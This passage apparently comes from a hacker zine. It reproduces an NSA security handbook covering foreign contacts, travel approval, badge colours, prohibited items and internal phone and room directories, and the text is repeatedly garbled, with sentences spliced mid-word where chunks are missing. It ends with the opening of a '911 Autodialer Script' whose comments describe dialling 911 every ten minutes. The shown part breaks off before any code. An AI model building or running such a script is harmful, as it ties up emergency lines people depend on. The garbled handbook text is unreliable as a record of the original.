  779. protected information, e.g., information relating to the organization, mission,
  780. functions, or activities of NSA.  Your obligation to protect this sensitive
  781. information is a lifetime one.  Even when you resign, retire, or otherwise end
  782. your affiliation with NSA, you must submit this type of material for
  783. prepublication review.  For additional details, contact the Information Poepublication review procedures.
  784.  
  785. Personnel Security Responsibilities
  786.  
  787. Perhaps you an recall your initial impression upon entering an NSA facility.
  788. Like most people, you prob
  789. safeguards--fences, concrete barriers, Security Protective Officers,
  790. identification badges, etc.  While these measures provide a substantial degree
  791. of protection for the information housed within our buildings, they represent
  792. only a portion of the overall Agency security program.  In fact, vast amounts
  793. of information leave our facilities daily in the minds of NSA personnel, and
  794. this is where our greatest vulnerability lies.  Experience has indicated that
  795. because of the vital information we work with at NSA, Agency personnel may
  796. become potential targets for hostile intelligence efforts.  Special safeguards
  797. are therefore necessary to protect our personnel.
  798.  
  799. Accordingly, the Agency has an extensive personnel security program which
  800. establishes internal policies and guidelines governing employee conduct and
  801. activities.  These policies cover a variety of topics, all of which are
  802. designed to protect both you and the sensitive information you will gain
  803. through your work at NSA.
  804.  
  805. Association With Foreign Nationals
  806.  
  807. As a member of the U.S. Intelligence Community and by virtue of your access to
  808. sensitive information, you are a potential target for hostile intelligence
  809. activities carried out by or on behalf of citizens of foreign
  810. countries.  A policy concerning association with foreign nationals has been
  811. established by the Agency to minimize the likelihood that its personnel might
  812. become subject to undue influence or duress or targets of hostile activities
  813. through foreign relationships.
  814.  
  815. As an NSA affiliate, you are prohibited from initiating or maintaining
  816. associations (regardless of the nature and degree) with citizens or officials
  817. of communist-controlled, or other countries which pose a significant threat to
  818. the security of the United States and its interests.  A comprehensive list of
  819. these designated countries is available from your Staff Security Officer or the
  820. Security Awareness Division.  Any contact with citizens of these countries, no
  821. matter how brief or seemingly innocuous, must be reported as soon as possible
  822. to your Staff Security Officer (SSO).  (Individuals designated as Staff
  823. Security Officers are assigned to every organization; a listing of Staff
  824. Security Officers can be found at the back of this handbook).
  825.  
  826. Additionally, close and continuing associations with any non-U.S. citizens which
  827. are characterized by ties of kinship, obligation, or affection are prohibited.
  828. A waiver to this policy may be granted only under the most exceptional
  829. circumstances when there is a truly compelling need for an individual's
  830. services or skills and the security risk is negligible.
  831.  
  832. In particular, a waiver must be granted in advance of a marriage to or
  833. cohabitation with a foreign national in order to retain one's access to NSA
  834. information.  Accordinglon-U.S.
  835. citizen must be reported immediately to your Staff Security Officer.  If a
  836. waiver is granted, future reassignments both at headquarters and overseas may
  837. be affected.
  838.  
  839. The marriage or intended marriage of an immediate family member (parents,
  840. siblings, children) to a foreign national must also be reported through your
  841. SSO to the Clearance Division (M55).
  842.  
  843. Casual social associations with foreign nationals (other than those of the
  844. designated countries mentioned above) which arise from normal living and
  845. working arrangements in the community usually do not have to be reported.
  846. During the course of these casual social associations, you are encouraged to
  847. extend the usual social amenities.  Do not act mysteriously or draw attention
  848. to yourself (and possibly to NSA) by displaying an unusually wary attitude.
  849.  
  850. Naturally, your affiliation with the Agency and the nature of your work should
  851. not be discussed.  Again, you should be careful not to allow these associations
  852. to become close and continuing to the extent that they are characterized by
  853. ties of kinship, obligation, or affection.
  854.  
  855. If at any time you feel that a "casual" association is in any way suspicious,
  856. you should report this to your Staff Security Officer immediately.  Whenever
  857. any doubt exists as to whether or not a situation should be reported or made a
  858. matter of record, you should decided in favor of reporting it.  In this way,
  859. the situation can be evaluated on its own merits, and you can be advised as to
  860. your future course of action.
  861.  
  862. Correspondence With Foreign Nationals
  863.  
  864. NSA personnel are discouraged from initiating correspondence with individuals
  865. who are citizens of foreign countries.  Correspondence with citizens of
  866. communist-controlled or other designated countries is prohibited.  Casual
  867. social correspondence, including the "penpal" variety, with other foreign
  868. acquaintances is acceptable and need not be reported.  If, however, this
  869. correspondence should escalate in its frequency or natur Security Officer to the Clearance Division (M55).
  870.  
  871. Embassy Visits
  872.  
  873. Since a significant percentage of all espionage activity is known to be
  874. conducted through foreign embassies, consulates, etc., Agency policy
  875. discourages visits to embassies, consulates or other official establishments of
  876. a foreign government.  Each case, however, must be judged on the circumstances
  877. involved.  Therefore, if you plan to visit a foreign embassy for any reason
  878. (even to obtain a visa), you must consult with, and obtain the prior approval
  879. of, your immediate supervisor and the Security Awareness Division (M56).
  880.  
  881. Amateur Radio Activities
  882.  
  883. Amateur radio (ham radio) activities are known to be exploited by hostile
  884. intelligence services to identify individuals with access to classified
  885. information; therefore, all licensed operators are expected to be familiar
  886. with NSA/CSS Regulation 100-1, "Operation of Amateur Radio Stations" (23
  887. October 1986).  The specific limitations on contacts with operators from
  888. communist and designated countries are of particular importance.  If you are
  889. an amateur radio operator you should advise the Security Awareness Division
  890. (M56) of your amateur radio activities so that detailed guidance may be
  891. furnished to you.
  892.  
  893. Unofficial Foreign Travel
  894.  
  895. In order to further protect sensitive information from possible compromise
  896. resulting from terrorism, coercion, interrogation or capture of Agency
  897. personnel by hostile nations and/or terrorist groups, the Agency has
  898. established certain policies and procedures concerning unofficial foreign
  899. travel.
  900.  
  901. All Agency personnel (civilian employees, military assignees, and contractors)
  902. who are planning unofficial foreign travel must have that travel approved by
  903. submitting a proposed itinerary to the Security Awareness Division (M56) at
  904. least 30 working days prior to their planned departure from the United States.
  905. Your itinerary should be submitted on Form K2579 (Unofficial Foreign Travel
  906. Request).  This form provides space for noting the countries to be visited,
  907. mode of travel, and dates of departure and return.  Your immediate supervisor
  908. must sign this form to indicate whether or not your proposed travel poses a
  909. risk to the sensitive information, activities, or projects of which you may
  910. have knowledge due to your current assignment.
  911.  
  912. After your supervisor's assessment is made, this form should be forwarded to
  913. the Security Awareness Director (M56).  Your itinerary will then be reviewed in
  914. light of thies to be visited, and
  915. a decision for approval or disapproval will be based on this assessment.  The
  916. purpose of this policy is to limit the risk of travel to areas of the world
  917. where a threat may exist to you and to your knowledge of classified Agency
  918. activities.
  919.  
  920. In this context, travel to communist-controlled and other hazardous activity
  921. areas is prohibited.  A listing of these hazardous actie hazardous activity areas can be found in Annex
  922. A of NSA/CSS Regulation No. 30-31, "Security Requirements for Foreign Travel"
  923. (12 June 1987).  From time to time, travel may also be prohibited to certain
  924. areas where the threat from hostile intelligence services, terrorism, criminal
  925. activity or insurgency poses an unacceptable risk to Agency employees and to
  926. the sensitive information they possess.  Advance travel deposits made without
  927. prior agency approval of the proposed travel may result in financial losses by
  928. the employee should the travel be disapproved, so it is important to obtain
  929. approval prior to committing ich
  930. areas of the world currently pose a threat should be directed to the Security
  931. Awareness Division (M56).
  932.  
  933. Unofficial foreign travel to Canada, the Bahamas, Bermuda, and Mexico does not
  934. require prior approval, however, this travel must still be reported using Form
  935. K2579.  Travel to these areas may be reported after the fact.
  936.  
  937. While you do not have to report your foreign travel once you have ended your
  938. affiliation with the Agency, you should be aware that the risk incurred in
  939. travelling to certain areas, from a personal safety and/or counterintelligence
  940. standpoint, remains high.  The requirement to protect the classified
  941. information to which you have had access is a lifetime obligation.
  942.  
  943. Membership In Organizations
  944.  
  945. Within the United States there are numerous organizations with memberships
  946. ranging from a few to tens of thousands.  While you may certainly participate
  947. in the activities of any reputable organization, membership in any international
  948. club or professional organization/activity with foreign members should be
  949. reported through your Staff Security Officer to the Clearance Division (M55).
  950. In most cases there are no security concerns or threats to our employees or
  951. affiliates.  However, the Office of Security needs the opportunity to research
  952. the organi public activities
  953. of a conspicuously controversial nature because such activities could focus
  954. undesirable attention upon you and the Agency.  NSA employees may, however,
  955. participate in bona fide public affairs such as local politics, so long as such
  956. activities do not violate the provisions of the statutes and regulations which
  957. govern the political activities of all federal employees.  Additional
  958. information may be obtained from your Personnel Representative.
  959.  
  960. Changes In Marital Status/Cohabitation/Names
  961.  
  962. All personnel, either employed by or assigned to NSA, must advise the Office of
  963. Security of any changes in their marital status (either marriage or divorce),
  964. cohabitation arrangements, or legal name changes.  Such changes should be
  965. reported by completing NSA Form G1982 (Report of Marriage/Marital Status
  966. Change/Name Change), and following the instructions printed on the form.
  967.  
  968. Use And Abuse Of Drugs
  969.  
  970. It is the policy of the National Security Agency to prevent and eliminate the
  971. improper use of drugs by Agency employees and other personnel associated with
  972. the Agency.  The term "drugs" includes all controlled drugs or substances
  973. identified and listed in the Controlled Substances Act of 1970, as amended,
  974. which includes but is not limited to:  narcotics, depressants, stimulants,
  975. cocaine, hallucinogens ad cannabis (marijuana, hashish, and hashish oil).
  976. The use of illegal drugs or the abuse of prescription drugs by persons employed
  977. by, assigned or detailed to the Agency may adversely affect the national
  978. security; may have a serious damaging effect on the safety and the safety of
  979. others; and may lead to criminal prosecution.  Such use of drugs either within
  980. or outside Agency controlled facilities is prohibited.
  981.  
  982. Physical Security Policies
  983.  
  984. The physical security program at NSA provides protection for classified
  985. material and operations and ensures that only persons authorized access to the
  986. Agency's spaces and classified material are permitted such access.  This
  987. program is concerned not only with the Agency's physical plant and facilities,
  988. but also with the internal and external procedures for safeguarding the
  989. Agency's classified material and activities.  Therefore, physical security
  990. safeguards include Security Protective Officers, fences, concrete barriers,
  991. access control points, identification badges, safes, and the
  992. compartmentalization of physical spaces.  While any one of these safeguards
  993. represents only a delay factor against attempts to gain unauthorized access to
  994. NSA spaces and material, the total combination of all these safeguards
  995. represents a formidable barrier against physical penetration of NSA.  Working
  996. together with personnel security policies, they provide "security in depth."
  997.  
  998. The phng procedures.  The
  999. responsibility for carrying out many of these procedures rests with the
  1000. individual.  This means you, and every person employed by, assign, or detailed
  1001. to the Agency, must assume the responsibility for protecting classified
  1002. material.  Included in ors in
  1003. operational areas; determining "need-to-know;" limiting classified
  1004. conversations to approved areas; following established locking and checking
  1005. procedures; properly using the secure and non-secure telephone systems;
  1006. correctly wrapping and packaging classified data for transmittal; and placing
  1007. classified waste in burn bags.
  1008.  
  1009. The NSA Badge
  1010.  
  1011. Even before you enter an NSA facility, you have a constant reminder of
  1012. security--the NSA badge.  Every person who enters an NSA installation is
  1013. required to wear an authorized badge.  To enter most NSA facilities your badge
  1014. must be inserted into an Access Control Terminal at a building entrance and you
  1015. must enter your Personal Identification Number (PIN) on the terminal keyboard.
  1016. In the absence of an Access Control Terminal, or when passing an internal
  1017. security checkpoint, the badge should be held up for viewing by a Security
  1018. Protective Officer.  The badge must be displayed at all times while the
  1019. individual remains within any NSA installation.
  1020.  
  1021. NSA Badges must be clipped to a beaded neck chain.  If necessary for the safety
  1022. of those working in the area of electrical equipment or machinery, rubber
  1023. tubing may be used to insulate the badge chain.  For those Agency personnel
  1024. working in proximity to other machinery or equipment, the clip may be used to
  1025. attach the badge to the wearer's clothing, but it must also remain attached to
  1026. the chain.
  1027.  
  1028. After you leave an NSA installation, remove your badge from public view, thus
  1029. avoiding publicizing your NSA affiliation.  Your badge should be kept in a safe
  1030. place which is convenient enough to ensure that you will be reminded to bring it
  1031. with you to work.  A good rule of thumb is to afford your badge the same
  1032. protection  Visitor Control Center which services your
  1033. facility.
  1034.  
  1035. Should you lose your badge, you must report the facts and circumstances
  1036. immediately to the Security Operations Center (SOC) (963-3371s/688-6911b) so
  1037. that your badge PIN can be deactivated in the Access Control Terminals.  In the
  1038. event that you forget your badge when reporting for duty, you may obtain a
  1039. "non-retention" Temporary Badge at the main Visitor Control Center which serves
  1040. your facility after a co-worker personally identifies your and your clearance
  1041. has been verified.
  1042.  
  1043. Your badge is to be used as identification only within NSA facilities or other
  1044. government installations where the NSA badge is recognized.  Your badge should
  1045. never be used outside of the NSA or other government facilities for the purpose
  1046. of personal identification.  You should obtain a Department of Defense
  1047. identification card from the Civilian Welfare Fund (CWF) if you need to
  1048. identify ng for "government
  1049. discounts" offered at various commercial establishments.
  1050.  
  1051. Your badge color indicates your particular affiliation with NSA and your level
  1052. of clearance.  Listed below are explanations of the badge colors you are most
  1053. likely to see:
  1054.  
  1055.         Green (*)       Fully cleared NSA employees and certain military
  1056.                         assignees.
  1057.  
  1058.         Orange (*)      (or Gold) Fully cleared representative of other
  1059.                         government agencies.
  1060.  
  1061.         Black (*)       Fully cleared contractors or consultants.
  1062.  
  1063.         Blue            Employees who are cleared to the SECRET level while
  1064.                         awaiting completion of their processing for full
  1065.                         (TS/SI) clearance.  These Limited Interim Clearance
  1066.                         (LIC) employees are restricted to certain activities
  1067.                         while inside a secure area.
  1068.  
  1069.         Red             Clearance level is not specified, so assume the holder
  1070.                         is uncleared.
  1071.  
  1072. * - Fully cleared status means that the person has been cleared to the Top
  1073. Secret (TS) level and indoctrinated for Special Intelligence (SI).
  1074.  
  1075. All badges with solid color backgrounds (permanent badges) are kept by
  1076. individuals until their NSA employment or assignment ends.  Striped badges
  1077. ("non-retention" badges) are generally issued to visitors and are returned to
  1078. the Security Protective Officer upon departure from an NSA faciations there are generally two types of areas,
  1079. Administrative and Secure.  An Administrative Area is one in which storage of
  1080. classified information is not authorized, and in which discussions of a
  1081. classified nature are forbidden.  This type of area would include the
  1082. corridors, restrooms, cafeterias, visitor control areas, credit union, barber
  1083. shop, and drugstore.  Since uncleared, non-NSA personnel are often present in
  1084. these areas, all Agency personnel must ensure that no classified information is
  1085. discussed in an Administrative Area.
  1086.  
  1087. Classified information being transported within Agency facilities must be
  1088. placed within envelopes, folders, briefcases, etc. to ensure that its contents
  1089. or classification markings are not disclosed to unauthorized persons, or that
  1090. materials are not inadvertently dropped enroute.
  1091.  
  1092. The normal operational work spaces within an NSA facility are designated Secure
  1093. Areas.  These areas are approved for classified discussions and for the storage
  1094. of classified material.  Escorts must be provided if it is necessary for
  1095. uncleared personnel (repairmen, etc.) to enter Secure Areas, an all personnel
  1096. within the areas must be made aware of the presence of uncleared individuals.
  1097. All unknown, unescorted visitors to Secure Areas should be immediately
  1098. challenged by the personnel within the area, regardless of the visitors'
  1099. clearance level (as indicated by their badge color).
  1100.  
  1101. The corridor doors of these areas must be locked with a deadbolt and all
  1102. classified information in the area must be properly secured after normal
  1103. working hours or whenever the area is unoccupied.  When storing classified
  1104. material, the most sensitive material must be stored in the most secure
  1105. containers.  Deadbolt keys for doors to these areas must be returned to the key
  1106. desk at the end of the workday.
  1107.  
  1108. For further information regarding Secure Areas, consult the Physical Security
  1109. Division (M51) or your staff Security Officer.
  1110.  
  1111. Items Treated As Classified
  1112.  
  1113. For purposes of transportation, storage and destruction, there are certain
  1114. types of items which must be treated as classified even though they may not
  1115. contain classified information.  Such items include carbon paper, vu-graphs,
  1116. punched machine processing cards, punched paper tape, magnetic tape, computer
  1117. floppy disks, film, and used typewriter ribbons.  This special treatment is
  1118. necessary since a visual examination does not readily reveal whether the items
  1119. contain classified information.
  1120.  
  1121. Prohibited Items
  1122.  
  1123. Because of the potential security or safety hazards, certain items are
  1124. prohibited under normal circumstances from being brought into or removed from
  1125. any NSA installation.  These items have been groped into two general classes.
  1126. Class I prohibited items are those which constitute a threat to the saacilities.  Items in this category include:
  1127.  
  1128.         a.  Firearms and ammunition
  1129.         b.  Explosives, incendiary substances, radioactive materials, highly
  1130.             volatile materials, or other hazardous materials
  1131.         c.  Contraband or other illegal substances
  1132.         d.  Personally owned photographic or electronic equipment including
  1133.             microcomputers, reproduction or recording devices, televisions or
  1134.             radios.
  1135.  
  1136. Prescribed electronic medical equipment is normally not prohibited, but
  1137. requires coordination with the Physical Security Division (M51) prior to being
  1138. brought into any NSA building.
  1139.  
  1140. Class II prohibited items are those owned by the government or contractors
  1141. which constitute a threat to physical, technical, or TEMPEST security.
  1142. Approval by designated organizational officials is required before these items
  1143. can be brought into or removed from NSA facilities.  Examples are:
  1144.  
  1145.         a.  Transmitting and receiving equipment
  1146.         b.  Recording equipment and media
  1147.         c.  Telephone equipment and attachments
  1148.         d.  Computing devices and terminals
  1149.         e.  Photographic equipment and film
  1150.  
  1151. A more detailed listing of examples of Prohibited Items may be obtained from
  1152. your Staff Security Officer or the Physical Security Division (M51).
  1153.  
  1154. Additionally, you mas are also
  1155. restricted and should not be brought into any NSA facility.  Some of these
  1156. items pose a technical threat; others must be treated as restricted since a
  1157. visual inspection does not readily reveal whether they are classified.  These
  1158. items include:
  1159.  
  1160.         a.  Negatives from processed film; slides; vu-graphs
  1161.         b.  Magnetic media such as floppy disks, cassette tapes, and VCR
  1162.             videotapes
  1163.         c.  Remote control devices for telephone answering machines
  1164.         d.  Pagers
  1165.  
  1166. Exit Inspection
  1167.  
  1168. As you depart NSA facilities, you will note another physical security
  1169. safeguard--the inspection of the materials you are carrying.  This inspection
  1170. of your materials, conducted by Security Protective Officers, is designed to
  1171. preclude the inadvertent removal of classified material.  It is limited to any
  1172. articles that you are carrying out of the facility and maotebooks, magazines, gym bags, and other such items.
  1173. Although this practice may involve some inconvenience, it is conducted in your
  1174. best interest, as well as being a sound security practice.  The inconvenience
  1175. can be considerably reduced if you keep to a minimum the number of personal
  1176. articles that you remove from the Agency.
  1177.  
  1178. Removal Of Material From NSA Spaces
  1179.  
  1180. The Agency maintains strict controls regarding the removal of material from its
  1181. installations, particularly in the case of classified material.
  1182.  
  1183. Only under a very limited and official circumstances classified material be
  1184. removed from Agency spaces.  When deemed necessary, specific authorization is
  1185. required to permit an individual to hand carry classified material out of an NSA
  1186. building to another Secure Area.  Depending on the material and circumstances
  1187. involved, there are several ways to accomplish this.
  1188.  
  1189. A Courier Badge authorizes the wearer, for official purposes, to transport
  1190. classified material, magnetic media, or Class II prohibited items between NSA
  1191. facilities.  These badges, which are strictly controlled, are made available by
  1192. the Physical Security Division (M51) only to those offices which have specific
  1193. requirements justifying their use.
  1194.  
  1195. An Annual Security Pass may be issued to individuals whose official duties
  1196. require that they transport printed classified materials, information storage
  1197. media, or Class II prohibited items to secure locations within the local area.
  1198. Materials carried by an individual who displays this pass are subject to spot
  1199. inspection by Security Protective Officers or other personnel from the Office
  1200. of Security.  It is not permissible to use an Annual Security Pass for personal
  1201. convenience to circumvent inspection of your personal property by perimeter
  1202. Security Protective Officers.
  1203.  
  1204. If you do not have access to a Courier Badge and you have not been issued an
  1205. Annual Security Pass, you may obtain a One-Time Security Pass to remove
  1206. classified materials/magnetic media or admit or remove prohibited items from an
  1207. NSA installation.  These passes may be obtained from designated personnel
  1208. in your work element who have been given authority to issue them.  The issuing
  1209. official must also contact the Security Operations Center (SOC) to obtain
  1210. approval for the admission or removal of a Class I prohibited item.
  1211.  
  1212. When there is an official need to remove government property which is not
  1213. magnetic media, or a prohibited or classified item, a One-Time Property Pass is
  1214. used.  This type of pass (which is not a Security Pass) may be obtained from
  1215. your element custodial property officer.  A Propual is removing personal property which might be reasonably be
  1216. mistaken for unclassified Government property.  This pass is surrendered to the
  1217. Security Protective Officer at the post where the material is being removed.
  1218. Use of this pass does not preclude inspection of the item at the perimeter
  1219. control point by the Security Protective Officer or Security professionals to
  1220. ensure that the pass is being used correctly.
  1221.  
  1222. External Protection Of Classified Information
  1223.  
  1224. On those occasions when an individual must personally transport classified
  1225. material between locations outside of NSA facilities, the individual who is
  1226. acting as the courier must ensure that the material receives adequate
  1227. protection. Protective measures must include double wrapping and packaging of
  1228. classified information, keeping the material under constant control, ensuring
  1229. the presence of a second appropriately cleared person when necessary, and
  1230. delivering the material to authorized persons only.  If you are designated as a
  1231. courier outside the local area, contact the Security Awareness Division (M56)
  1232. for your courier briefing.
  1233.  
  1234. Even more basic than these procedures is the individual security responsibility
  1235. to confine classified conversations to secure areas.  Your home, car pool, and
  1236. public places are not authorized areas to conduct classified discussions--even
  1237. if everyone involved in he discussion possesses a proper clearance and
  1238. "need-to-know."  The possibility that a conversation could be overheard by
  1239. unauthorized persons dictates the need to guard against classified discussions
  1240. in non-secure areas.
  1241.  
  1242. Classified information acquired during the course of your career or assignment
  1243. to NSA may not be mentioned directly, indirectly, or by suggestion in personal
  1244. diaries, records, or memoirs.
  1245.  
  1246. Reporting Loss Or Disclosure Of Classified Information
  1247.  
  1248. The extraordinary sensitivity of the NSA mission requires the prompt reporting
  1249. of any known, suspected, or possible unauthorized disclosure of classified
  1250. information, or the discovery that classified information may be lost, or is not
  1251. being afforded proper protection.  Any information coming to your attention
  1252. concerning the loss or unauthorized disclosure of classified information should
  1253. be reported immediately to your supervisor, your Staff Security Officer, or the
  1254. Security Operations Center (SOC).
  1255.  
  1256. Use Of Secure And Non-Secure Telephones
  1257.  
  1258. Two separate telephone systems have been installed in NSA facilities for use in
  1259. the conduct of official Agency business:  the secure telephone system (gray
  1260. telephone) and the outside, non-secure telephone system (black telephone).  All
  1261. NSA personnel must ensure that use of either telephone system does not
  1262. jeopardize the security of classified information.
  1263.  
  1264. The secure telephone system is authorized for discussion of classified
  1265. information.  Personnel receiving calls on the secure telephone may assume that
  1266. the caller is authorized to use the system.  However, you must ensure that the
  1267. caller has a "need-to-know" the information you will be discussing.
  1268.  
  1269. The outside telephone system is only authorized for unclassified official
  1270. Agency business calls.  The discussion of classified information is not
  1271. permitted on this system.  Do not attempt to use "double-talk" in order to
  1272. discuss classified information over the non-secure telephone system.
  1273.  
  1274. In order to guard against the inadvertent transmission of classified
  1275. information over a non-secure telephone, and individual using the black
  1276. telephone in an area where classified activities are being conducted must
  1277. caution other personnel in the area that the non-secure telephone is in use.
  1278. Likewise, you should avoid using the non-secure telephone in the vicinity of a
  1279. secure telephone which is also in use.
  1280.  
  1281. HELPFUL INFORMATION
  1282.  
  1283. Security Resources
  1284.  
  1285. In the fulfillment of your security responsibilities, you should be aware that
  1286. there are many resources available to assist you.  If you have any questions or
  1287. concerns regarding security at NSA or your individual security
  1288. responsibilities, your supervisor should be consulted.  Additionally, Staff
  1289. Security Officers are appointed to the designated Agency elements to assist
  1290. these organizations in carrying out their security responsibilities.  There is
  1291. a Staff Security Officer assigned to each organization; their phone numbers are
  1292. listed at the back of this handbook.  Staff Security Officers also provide
  1293. guidance to and monitor the activities of Security Coordinators and Advisors
  1294. (individuals who, in addition to their operational duties within their
  1295. respective elements, assist element supervisors or managers in discharging
  1296. security responsibilities).
  1297.  
  1298. Within the Office of Security, the Physical Security Division (M51) will offer
  1299. you assistance in matters such as access control, security passes, clearance
  1300. verification, combination locks, keys, identification badges, technical
  1301. security, and the Security Protective Force.  The Security Awareness Division
  1302. (M56) provides security guidance and briefings regarding unofficial foreign
  1303. travel, couriers, special access, TDY/PCS, and amateur radio activities.  The
  1304. Industrial and Field Security Division (M52) is available to provide security
  1305. guidance concerning NSA contractor and field site matters.
  1306.  
  1307. The Security Operations Center (SOC) is operated by two Security Duty Officers
  1308. (SDOs), 24 hours a day, 7 days a week.  The SDO, representing the Office of
  1309. Security, provides a complete range of security services to include direct
  1310. communications with fire and rescue personnel for all Agency area facilities.
  1311. The SDO is available to handle any physical or personnel problems that may
  1312. arise, and if necessary, can direct your to the appropriate security office
  1313. that can assist you.  After normal business hours, weekends, and holidays, the
  1314. SOC is the focal point for all security matters for all Agency personnel and
  1315. facilities (to include Agency field sites and contractors).  The SOC is located
  1316. in Room 2A0120, OPS 2A building and the phone numbers are 688-6911(b),
  1317. 963-3371(s).
  1318.  
  1319. However, keep in mind thsion
  1320. within the Office of Security directly.  Do not hesitate to report any
  1321. information which may affect the security of the Agency's mission, information,
  1322. facilities or personnel.
  1323.  
  1324. Security-Related Services
  1325.  
  1326. In addition to Office of Security resources, there are a number of
  1327. professional, security-related services available for assistance in answering
  1328. your questions or providing the services which you require.
  1329.  
  1330. The Installations and Logistics Organization (L) maintains the system for the
  1331. collection and destruction of classified waste, and is also responsible for the
  1332. movement and scheduling of material via NSA couriers and the Defense Courier
  1333. Service (DCS).  Additionally, L monitors the proper addressing, marking, and
  1334. packaging of classified material being transmitted outside of NSA; maintains
  1335. records pertaining to receipt and transmission of controlled mail; and issues
  1336. property passes for the removal of unclassified property.
  1337.  
  1338. The NSA Office of Medical Services (M7) has a staff of physicians, clinical
  1339. psychologists and an alcoholism counselor.  All are well trained to help
  1340. individuals help themselves in dealing with their problems.  Counseling
  1341. services, with referrals to private mental health professionals when
  1342. appropriate, are all available to NSA personnel.  Appointments can be obtained
  1343. by contacting M7 directly.  When an individual refers himself/herself, the
  1344. information discussed in the counseling sessions is regarded as privileged
  1345. medical information and is retained exclusively in M7 unless it pertains to the
  1346. national security.
  1347.  
  1348. Counselling interviews are conducted by the Office of Civilian Personnel (M3)
  1349. with any civilian employee regarding both on and off-the-job problems.  M3 is
  1350. also available to assist all personnel with the personal problems seriously
  1351. affecting themselves or members of their families.  In cases of serious
  1352. physical or emotional illness, inrgencies, M3 informs concerned Agency elements and maintains liaison with
  1353. family members in order to provide possible assistance.  Similar counselling
  1354. services are available to military assignees through Military Personnel (M2).
  1355.  
  1356. GUIDE TO SECURITY
  1357.  
  1358. M51 PHYSICAL SECURITY 963-6651s/688-8293b (FMHQ)
  1359. 968-8101s/859-6411b (FANX)
  1360.  
  1361. CONFIRM and badges              Prohibited Items
  1362. (963-6611s/688-7411b)
  1363. Locks, keys, safes and alarms   SOC (963-3371s/688-6911b)
  1364. Security/vehicle passes         NSA facility protection and compliance
  1365. Visitor Control
  1366. Inspections
  1367. Red/blue seal areas             New Construction
  1368. Pass Clearances (963-4780s/688-6759b)
  1369.  
  1370. M52 INDUSTRIAL AND FIELD SECURITY
  1371. 982-7918s/859-6255b
  1372.  
  1373. Security at contractor field site facilities
  1374. Verification of classified mailing addresses for contractor facilities
  1375.  
  1376. M53 INVESTIGATIONS 982-7914s/859-6464b
  1377.  
  1378. Personnel Interview Program (PIP)       Reinvestigations
  1379. Military Interview Program (MIP)        Special investigations
  1380.  
  1381. M54 COUNTERINTELLIGENCE 982-7832s/859-6424b
  1382.  
  1383. Security counterintelligence analysis   Security compromises
  1384.  
  1385. M55 CLEARANCES 982-7900s/859-4747b
  1386.  
  1387. Privac/688-6535b
  1388.  
  1389. Security indoctrinations/debriefings            Embassy visits
  1390. Associations with foreign nationals             Briefings (foreign travel,
  1391. Security Week                                     ham radio, courier,
  1392. Security posters, brochures, etc.                 LIC, PCS, TDY,
  1393.                                                   special access, etc.)
  1394. Foreign travel approval
  1395. Military contractor orientation
  1396. Special Access Office (963-5466s/688-6353b)
  1397.  
  1398. M57 POLYGRAPH 982-7844s/859-6363b
  1399.  
  1400. Polygraph interviews
  1401.  
  1402. M509 MANAGEMENT AND POLICY STAFF 982-7885s/859-6350b
  1403.  
  1404. STAFF SECURITY OFFICERS (SSOs)
  1405.  
  1406. Element                 Room            Secure/Non-Secure
  1407. A                       2A0852B         963-4650/688-7044
  1408. B                       3W099           963-4559/688-7141
  1409. D/Q/J/N/U               2B8066G         963-4496/688-6614
  1410. E/M                     D3B17           968-8050/859-6669
  1411. G                       9A195           963-5033/688-7902
  1412. K                       2B5136          963-1978/688-5052
  1413. L                       SAB4            977-7230/688-6194
  1414. P                       2W091           963-5302/688-7303
  1415. R                       B6B710          968-4073/859-4736
  1416. S/V/Y/C/X               C2A55           972-2144/688-7549
  1417. T                       2B5040          963-4543/688-7364
  1418. W                       1C181           963-5970/688-7061
  1419.  
  1420. GUIDE TO SECURITY-RELATED SERVICES
  1421.  
  1422. Agenc859-4381
  1423. Alcohol Rehabilitation Program          963-5420/688-7312
  1424. Cipher Lock Repair                      963-1221/688-7119
  1425. Courier Schedules (local)               977-7197/688-7403
  1426. Defense Courier Service                 977-7117/688-7826
  1427. Disposal of Classified Waste
  1428.         - Paper only                    972-2150/688-6593
  1429.         - Plastics, Metal, Film, etc    963-4103/688-7062
  1430. Locksmith                               963-3585/688-7233
  1431. Mail Dissemination and Packaging        977-7117/688-7826
  1432. Medical Center (Fort Meade)             963-5429/688-7263
  1433.         (FANX)                          968-8960/859-6667
  1434.         (Airport Square)                982-7800/859-6155
  1435. NSA/CSS Information Policy Division     963-5825/688-6527
  1436. Personnel Assistance
  1437.         - Civilian                      982-7835/859-6577
  1438.         - Air Force                     963-3239/688-7980
  1439.         - Army                          963-3739/688-6393
  1440.         - Navy                          963-3439/688-7325
  1441. Property Passes (unclassified material) 977-7263/688-7800
  1442. Psychological Services                  963-5429/688-7311
  1443.  
  1444. FREQUENTLY USED ACRONYMS/DESIGNATORS
  1445.  
  1446. ARFCOS  Armed Forces Courier Service (now known as DCS)
  1447. AWOL    Absent Without Leave
  1448. CAO     Classification Advisory Officer
  1449. COB     Close of Business
  1450. CWF     Civilian Welfare Fund
  1451. DCS     Defense Courier Service (formerly known as ARFCOS)
  1452. DoD     Department of Defense
  1453. EOD     Enter on Duty
  1454. FOUO    For Official Use Only
  1455. M2      Office of Military Personnel
  1456. M3      Office of Civilian Personnel
  1457. M5      Office of Security
  1458. M7      Office of Medical Services
  1459. NCS     National Cryptologic School
  1460. PCS     Permanent Change of Station
  1461. PIN     Personal Identification Number
  1462. Q43     Information Policy Division
  1463. SDO     Security Duty Officer
  1464. SOC     Security Operations Center
  1465. SPO     Security Protective Officer
  1466. SSO     Staff Security Officer
  1467. TDY     Temporary Duty
  1468. UFT     Unofficial Foreign Travel
  1469.  
  1470. A FINAL NOTE
  1471.  
  1472. The information you have just read is designed to serve as a guide to assist
  1473. you in the conduct of your security responsibilities.  However, it by no means
  1474. describes the extent of your obligation to protect information vital to the
  1475. defense of our nation.  Your knowledge of specific security regulations is part
  1476. of a continuing process of education and experience.  This handbook is designed
  1477. to provide the foundation of this knowledge and serve as a guide to the
  1478. development of an attitude of security awareness.
  1479.  
  1480. In the final analysis, security is an individual responsibility.  As a
  1481. participant in the activities of the National Security Agency organization, you
  1482. are urged to be always mindful of the importance of the work being accomplished
  1483. by NSA and of the unique sensitivity of the Agency's operations.
  1484.  
  1485. ───────────────────────────────────────────────────────────────────────────────
  1486.   8. 911 Autodialer Script : The CodeZero Crew.
  1487. ───────────────────────────────────────────────────────────────────────────────
  1488.  
  1489. #!/bin/sh
  1490. # 911-autodial.sh
  1491. # for use with linux boxes running DIP.
  1492. # dials 911 every ten minutes, and if the user is using pppd
  1493. # it kills pppd in order to place the call.
  1494.  
  1495. # IMPORTANT!!!
